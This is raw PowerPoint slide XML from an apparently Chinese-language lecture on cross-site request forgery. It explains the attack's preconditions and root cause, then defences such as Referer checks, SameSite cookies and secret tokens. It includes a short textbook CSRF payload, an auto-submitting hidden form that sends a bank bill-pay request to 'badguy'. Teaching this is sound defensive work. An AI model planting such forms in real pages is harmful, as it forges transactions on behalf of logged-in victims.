          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户登陆到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Session cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>保持在浏览器状态中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户访问了包含以下网页代码的另一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form  name=F  action=http://bank.com/BillPay.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;input  name=recipient   value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.F.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(); &lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和通过认证的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一起发送给服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>请求将被执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0"/>
              <a:t>More</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>www.cnblogs.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/4littleProgrammer/p/5089958.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>认证不足以保证安全性</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626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zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>表单</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81923" name="Picture 12" descr="basic-csrf-black"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="412750" y="1462088"/>
            <a:ext cx="8350250" cy="5395912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4443829" y="4191000"/>
            <a:ext cx="2337971" cy="2365433"/>
            <a:chOff x="4443829" y="4267200"/>
            <a:chExt cx="2337971" cy="2365433"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4443829" y="6232525"/>
              <a:ext cx="1210586" cy="400108"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="91439" tIns="45719" rIns="91439" bIns="45719">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>用户凭证</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4479925" y="4267200"/>
              <a:ext cx="2301875" cy="47942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anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4618038" y="5218112"/>
              <a:ext cx="1485900" cy="542925"/>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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4675188" y="4403725"/>
            <a:ext cx="2122487" cy="236538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82296" tIns="41148" rIns="82296" bIns="41148">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=523FA4cd2E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533400"/>
            <a:ext cx="8451300" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324400" y="1479711"/>
            <a:ext cx="8520600" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的两个条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以伪造跨站请求的网页链接，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户会访问它</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户必须已经成功登陆目标网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1087253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dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>的根本原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1450467"/>
            <a:ext cx="8520600" cy="4864168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器无法区分请求是跨站点还是同站点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>同一站点请求：来自服务器自己的页面。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>跨网站请求：来自其他网站的网页。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不可信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>不能将这两种请求视为相同。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器是否知道区别？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>Yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>！ 浏览器知道从哪个页面生成请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>浏览器能帮助吗？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如何帮助服务器？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>Referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>（浏览器的帮助）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>Same-site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>（浏览器的帮助）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>Secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>（服务器帮助自己抵御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74454" y="6264633"/>
            <a:ext cx="8995092" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/OWASP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>CheatSheetSeries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/blob/master/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>cheatsheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/Cross-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Site_Request_Forgery_Prevention_Cheat_Sheet.md</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99384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311700" y="647155"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>对策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1"/>
              <a:t>Refe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1"/>
              <a:t>rer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t> Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
